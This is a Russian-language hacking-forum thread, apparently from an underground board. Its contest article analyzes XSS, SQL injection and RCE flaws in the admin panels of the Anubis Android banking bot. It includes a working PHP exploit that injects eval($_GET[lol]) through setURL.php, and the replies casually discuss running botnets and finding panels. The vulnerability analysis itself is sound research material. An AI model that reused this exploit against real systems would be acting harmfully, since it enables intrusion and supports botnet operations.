Конкурсная статья Изучаем Anubis

RedBear

RAID-массив
Пользователь
Регистрация
12.05.2019
Сообщения
70
Реакции
347
Баллы
66
Telegram
Jabber
Для конкурса статей, решил сделать анализ панели Анубиса. Бот популярный, наделал много шума, найти админки разных версий не составляет труда.

Вместе с вами мы проследим, как со временем улучшалось качество и безопасность кода.

Android Bot by maza-in

Начнем с саааааамой старой версии. С той версии, когда непосредственно Анубиса еще не было, а был просто "Android Bot by maza-in". Тот самый бот из статьи, которая заняла первое место на конкурсе:

Говорят, дареному коню в зубы не смотрят, но мы всё же посмотрим.

XSS

Начнем с простенького. Файл kliets.php. Следим за руками (стрелочками):


И вывод на страничку:

Может данные как-то фильтруются, когда попадают в БД? Файлик set_data.php, где код добавления новых ботов:

Это чудесно, что используется функция htmlspecialchars(), однако смысла в ней нет никакого - дальше идет расшифровка данных, и уже они попадают в SQL-запрос без какой-либо фильтрации.

Клепаем простенький сплойтик, отправляем пайлоад в админку, результат:

SQL-injection

Как было упомянуто выше, имеются и sql-инъекции. Однако, мы не будем морочиться с тем, чтобы формировать какой-то хитрый запрос от бота, есть путь существенно проще.

Файл command_go_modul.php, доступен кому угодно:

Учитывая, что это PDO, можно просто дописать еще SQL команды, после точки с запятой:

На скриншоте видно, как можно удалить всё из таблицы commands. Но не обязательно что-либо удалять - мы можем использовать любой другой SQL-запрос (INSERT, UPDATE, DROP, CREATE).

Anubis
А это уже не паблик бот. Приватный продукт, который все хотят купить, но никто не знает где достать. Давайте посмотрим, какие изменения коснулись кода панели.

XSS

Как и в старой версии, никакой фильтрации нет (всё тот же файл kliets.php):

И чуть ниже, как мы любим:

Точно также - делаем "отстук" ботом с полезной нагрузкой и:

SQL Injection

Всё те же самые ошибки. Только файл теперь называется set_go_modul.php:

И далее:

Совершенно также - дописываем код, ставим точку с запятой и выполняем любую SQL-команду.

Разумеется, бот по ру не работал, ни в коем случае:

Наверное, супостаты х#й в жопу инжекты в папку подкинули.
Как-то странно, этот бот, образно выражаясь, уже не дареный, но зубы у него такие же гнилые как и у прошлого...

Anubis 2.5
Перескочим на последнюю версию. Должно быть здесь то уже всё схвачено. Но...

XSS
Структура панели поменялась, файлы переименованы, но все ошибки были заботливо сохранены (botstable.php):


И чуть ниже:

Если кто-то получит доступ к phpmyadmin или adminer, то от XSS не защититься. Но может быть были предприняты какие-то меры и есть какая-никакая фильтрация на входе?

Смотрим файлик a3.php:

И еще раз, чуть ниже:


ШТОШ. Ну не в этот раз. Опять отправляем через бота запрос и опять наблюдаем уже поднадоевший alert:


SQL injection

Если еще раз посмотреть на код файла a3.php, можно заметить, что PDO::prepare используется совершенно неправильно:



Это как надо, а в коде просто переменные в кавычках. Выходит, как и в прошлых версиях, в этой мы тоже можем выполнить любой SQL-код. Стабильность - это то, что действительно нужно в нашем нелегком деле.

RCE

В новой версии, автор не мог нас не порадовать чем-то новеньким. Посмотрим на файл setURL.php:


Эксплоит не сильно сложный:
Код:
<?php
 
$seturl= "path_to_anubis/inj/setURL.php";
 
$url = parse_url($seturl);
$payload = md5($url['scheme']."://".$url['host'];).'|https://123{$kek[eval($_GET[lol])]}';
 
$opts = array('http' =>
    array(
    'method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded',
    'content' => http_build_query(array('p' => $payload));
    )
);
 
$context = stream_context_create($opts);
$result = file_get_contents($seturl, false, $context);
Как отработает, можем творить непотребства:

Заключение.

Да, потом с мазой случилось и заключение, но речь совершенно не об этом.
Как мы можем видеть, в коде панели шлейф из ошибок, еще с самой первой версии, конца 2016 года. Неважно, бесплатно раздается продукт или продается в тех самых "приватах" за нескромные суммы - от уязвимостей это не спасает.
Всё как всегда.
 

RedBear

RAID-массив
Пользователь
Регистрация
12.05.2019
Сообщения
70
Реакции
347
Баллы
66
Telegram
Jabber
Если объединить XSS в админке любого бота и технику вроде описанной здесь - https://krober.biz/?p=3282, у атакующего будет куда больше, чем просто логи с 2-3 полудохлых ботов. И под атакующим я подразумеваю вовсе не хакера с корыстным интересом, а товарищей вроде тех, что работают на уничтожителя таксистов, АВ, органы и т.д. (для примера - ютуб/watch?v=ODW4-hrSy-w).
 
Последнее редактирование:

mugwort

(L3) cache
Забанен
Регистрация
30.08.2019
Сообщения
187
Реакции
121
Баллы
43
Пожалуйста, обратите внимание, что пользователь заблокирован
И под атакующим я подразумеваю вовсе не хакера с корыстным интересом, а товарищей вроде тех, что работают на уничтожителя таксистов
1574533901600.png

Красиво а̶б̶а̶с̶р̶а̶л̶ разОбрал в духе Ацамаса
Для конкурса статей ??
какого нахуй ацамаса?При чем тут это вообще?
 

Vacation

RAM
Пользователь
Регистрация
08.06.2019
Сообщения
105
Реакции
170
Баллы
44
Красиво а̶б̶а̶с̶р̶а̶л̶ разОбрал в духе Ацамаса
Для конкурса статей ??
Ацамаз в отличии от 99% людей на мой взгляд, в свои 16 лет заработал больше чем все те остальные % на протяжении 16-25 лет, если не больше.
Да, был проеб, да повязали, но разве свои деньги он не заработал?

p.s. хоть в кодинге и не разбираюсь от слова совсем, но статья понравилась, заставляет задуматься о небезопасности использования панелек софта.
 

Crypto Locker

(L3) cache
Забанен
Регистрация
22.10.2019
Сообщения
178
Реакции
112
Баллы
39
Пожалуйста, обратите внимание, что пользователь заблокирован
Ацамаз в отличии от 99% людей на мой взгляд, в свои 16 лет заработал больше чем все те остальные % на протяжении 16-25 лет, если не больше.
Да, был проеб, да повязали, но разве свои деньги он не заработал?

p.s. хоть в кодинге и не разбираюсь от слова совсем, но статья понравилась, заставляет задуматься о небезопасности использования панелек софта.
кто такой ацамаз?
 

vpower

RAM
Пользователь
Регистрация
01.09.2019
Сообщения
123
Реакции
35
Баллы
23
Всё пиздец , расходимся господа...
А по теме, есть у кого норм панель? Или прямые руки) жду в лс
 

goffyy

HDD-drive
Пользователь
Регистрация
22.08.2019
Сообщения
29
Реакции
5
Баллы
4
Зачем панель используй ТГ. стучат сейчас все в ботовТГ своих
Всё пиздец , расходимся господа...
А по теме, есть у кого норм панель? Или прямые руки) жду в лс
 

RedBear

RAID-массив
Пользователь
Регистрация
12.05.2019
Сообщения
70
Реакции
347
Баллы
66
Telegram
Jabber
Зачем панель используй ТГ. стучат сейчас все в ботовТГ своих
Да, все APT юзают ТГ-ботов. Топ-техника настоящих профи.
И еще управлять то как удобно, особенно когда чуть больше 10 ботов.
 

goffyy

HDD-drive
Пользователь
Регистрация
22.08.2019
Сообщения
29
Реакции
5
Баллы
4
Да, все APT юзают ТГ-ботов. Топ-техника настоящих профи.
И еще управлять то как удобно, особенно когда чуть больше 10 ботов.
чувствуется доля сарказма, а может быть и не доля :D но есть свои плюсы и там.
 

BFG

ripper
КИДАЛА
Регистрация
20.10.2019
Сообщения
14
Реакции
7
Баллы
9
Jabber
Пожалуйста, обратите внимание, что пользователь заблокирован
ай ай ай. работа по ру)
 

Izg0y

HDD-drive
Пользователь
Регистрация
28.01.2008
Сообщения
40
Реакции
14
Баллы
18
Jabber
ру-ру = да ебал я всё в пизду!

Нарожают - майся с ними. Это всё когда было? сейчас рынок вполне себе и есть разгуляться и понажыриться есть и совесть не причём будет.
 

mugwort

(L3) cache
Забанен
Регистрация
30.08.2019
Сообщения
187
Реакции
121
Баллы
43
Пожалуйста, обратите внимание, что пользователь заблокирован
Ацамаз в отличии от 99% людей на мой взгляд, в свои 16 лет заработал больше чем все те остальные % на протяжении 16-25 лет, если не больше.
Да, был проеб, да повязали, но разве свои деньги он не заработал?
16-25 лет?Мне кажется вы сильно переоцениваете сколько он заработал...
в любом случае это того не стоило - теперь он сосет х#й работая на фрилансе потому что на нормальную работу его уже никогда с такой репутацией не возьмут (типа майков или аверов,куда он метил),за пределы рф он тоже поехать никуда не может...Так себе ситуация если честно
 
Последнее редактирование:

Galleon

HDD-drive
Пользователь
Регистрация
28.07.2019
Сообщения
41
Реакции
4
Баллы
12
Кробер сайт твой? Купил чтоль? Текста годичные и нынишние очень сильно отличаються, как будто другой человек писал.
 

netcat

(L3) cache
Забанен
Регистрация
26.07.2019
Сообщения
152
Реакции
433
Баллы
69
Пожалуйста, обратите внимание, что пользователь заблокирован
Кробер сайт твой? Купил чтоль? Текста годичные и нынишние очень сильно отличаються, как будто другой человек писал.
дааа, старые текста были классными, как буд-то медведъ под чем то :D сейчас видимо бросил дурь )
 

Galleon

HDD-drive
Пользователь
Регистрация
28.07.2019
Сообщения
41
Реакции
4
Баллы
12
дааа, старые текста были классными, как буд-то медведъ под чем то :D сейчас видимо бросил дурь )
и помолодел лет на 10 :)))) Может быть яспутал, может не годичные а те что были 1-3 года назад. В прошлом году читал блог.
 

RedBear

RAID-массив
Пользователь
Регистрация
12.05.2019
Сообщения
70
Реакции
347
Баллы
66
Telegram
Jabber
Кробер сайт твой? Купил чтоль? Текста годичные и нынишние очень сильно отличаються, как будто другой человек писал.
Что вероятнее - что кто-то по своей глупости выкупил наркоманский блог или что человек, который ведет блог, может варьировать стиль текстов, которые пишет? Или еще вариант. А что если блог всё это время вёл не один человек, а несколько?
 
Верх